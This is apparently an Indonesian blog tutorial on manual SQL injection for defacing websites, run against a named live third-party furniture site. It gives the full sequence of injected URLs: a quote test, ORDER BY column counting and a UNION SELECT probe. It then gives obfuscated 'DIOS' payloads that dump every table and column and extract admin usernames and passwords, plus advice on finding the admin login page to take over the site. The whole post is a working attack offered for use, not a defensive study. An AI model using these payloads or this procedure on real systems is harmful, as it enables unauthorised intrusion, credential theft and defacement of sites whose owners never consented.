Header Ads

test

Deface metode sql injection manual with Dios

Assalamualaikum w.r w.b
Bertemu lagi dengan saya
Kali ini saya akan memberikan tutorial SQL Injection Manual

Oke.... disimak ya hehe :p

BAHAN
1.internet cuy yakali kaga pake internet
2.dork *kalian bisa cek dork disini > Dork SQL injection
3.web yg vuln sql injection
    *disini saya ada live target :
      http://rahmadewifurniture.com/media.php?module=detailproduk&id=460

yups langsung saja

- sekarang kita tambahkan '
jadinya seperti ini : http://rahmadewifurniture.com/media.php?module=detailproduk&id=460'  
- yaps disini kita menemukan error atau ada gambar yg hilang.
*seperti ini:
- lalu kita disini melakukan perintah +order+by+1--+
- misal seperti ini :
- lakukan order by hingga menemukan error lagi seperti ini saya menemuka error di angka 16.
- berarti kita hanya ambil sampai 15 saja karena error nya di 16.
- selanjutnya kita melakukan perintah +union+select+ dan menambahkan [ - ] sebelum angka
- jadinya seperti ini : http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- yaps disini muncul angka togel ya itu 14 dan 3.
- agar tidak lama untuk mencari database table dan column kita menggunakan dios saja
- masukan dios ini
 [ /*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/ ]
- yaps disini langsung keluar database table dan column nya.
- selanjutnya kita tinggal ambil user / password admin.
- dengan cara memasukan dios berikut
  [ (/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x) ]
- bisa dibilang seperti ini :
   http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admins)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4,5,6,7,8,9,10,11,12,13,14,15--+
 *sesuaikan nama table dan colum nya ya..
- dan yaps sekarang kita sudah mendapatkan user dan password admin nya.
- tinggal kalian cari saja halaman admin nya biasanya di
* -/admin
   -/administrator
   -/login.php
   -/admin.php
- jika belum ketemu juga kalian bisa download dirbuster atau memakai admin finder online. :)

Yups cukup sekian tutorial kali ini semoga bermanfaat.
See you on the next tutorial....
and peaceee :p

Tidak ada komentar